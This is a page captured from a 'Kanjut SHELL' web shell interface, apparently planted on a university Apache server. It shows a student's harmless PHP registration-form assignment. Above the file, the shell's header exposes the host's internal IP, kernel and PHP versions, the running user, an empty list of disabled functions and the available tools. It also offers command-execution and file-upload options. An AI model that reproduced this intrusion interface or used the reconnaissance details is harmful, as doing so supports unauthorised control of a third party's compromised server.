Kanjut SHELL
Server IP : 172.16.15.8  /  Your IP : 18.118.193.28
Web Server : Apache
System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.2.24
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home/vgmiller/public_html/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/vgmiller/public_html/studentRegistration1.php
<!--
	Author: Valerie Miller
	Instructor: Dr. Wang
	File Name: studentRegistration1.html
	Due Date: March 13, 2018
	Goal: To create a student registration form.
-->

<CENTER>
<H2>
Student Registration Form
</H2>

<form action=testReg.php  method=post>
<HR>
Name: <INPUT type=text name=name>
<P>
Gender: <select name=gender>
<?php
	print "<option>Male</option>";
	print "<option>Female</option>";
?>
</select>
<P>
Year: <select name=year>
<?php
	print "<option>Freshman</option>";
	print "<option>Sophomore</option>";
	print "<option>Junior</option>";
	print "<option>Senior</option>";
?>
</select>
<P>
<input type=submit value=Submit>
<input type=reset value=Reset>

</form>

</CENTER>








Stv3n404 - 2023